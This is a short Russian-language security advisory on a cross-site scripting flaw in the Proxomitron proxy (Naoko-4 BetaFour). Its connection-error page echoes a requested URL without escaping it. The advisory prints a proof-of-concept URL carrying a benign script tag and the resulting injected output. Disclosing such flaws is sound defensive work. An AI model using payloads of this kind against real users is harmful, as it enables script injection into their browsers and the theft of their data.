Proxomitron позволяет пользователям, использующим специальные HTML фильтры, преобразовать web-страницы на лету - изменять почти все, что они желают, ускоряя при этом загрузку web-страницы. Уязвимость защиты в программе позволяет нападавшим добавлять код JavaScript к коду HTML,
посланному отдаленным сайтом. 

Если нападавшие посылают следующий URL пользователю, использующему Proxomitron в качестве прокси-сервера: 

http://WWW.example.com:9999/<SCRIPT> document.write(document.domain)<//SCRIPT> 

Proxomitron произведет кое-что вроде этого: 

<html><head><title>The Proxomitron Reveals...</title>
...
The Proxomitron couldn't connect to...<br>
<font color=#ffff00 size=+1 > 
www.example.com:9999/<SCRIPT>document.write(document.domain)</SCRIPT>
</font><br>
The site may be busy or the web server may be down...

При этом порожденный JavaScript код будет исполнен. 
Уязвимость найдена в Proxomitron Naoko-4 BetaFour.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии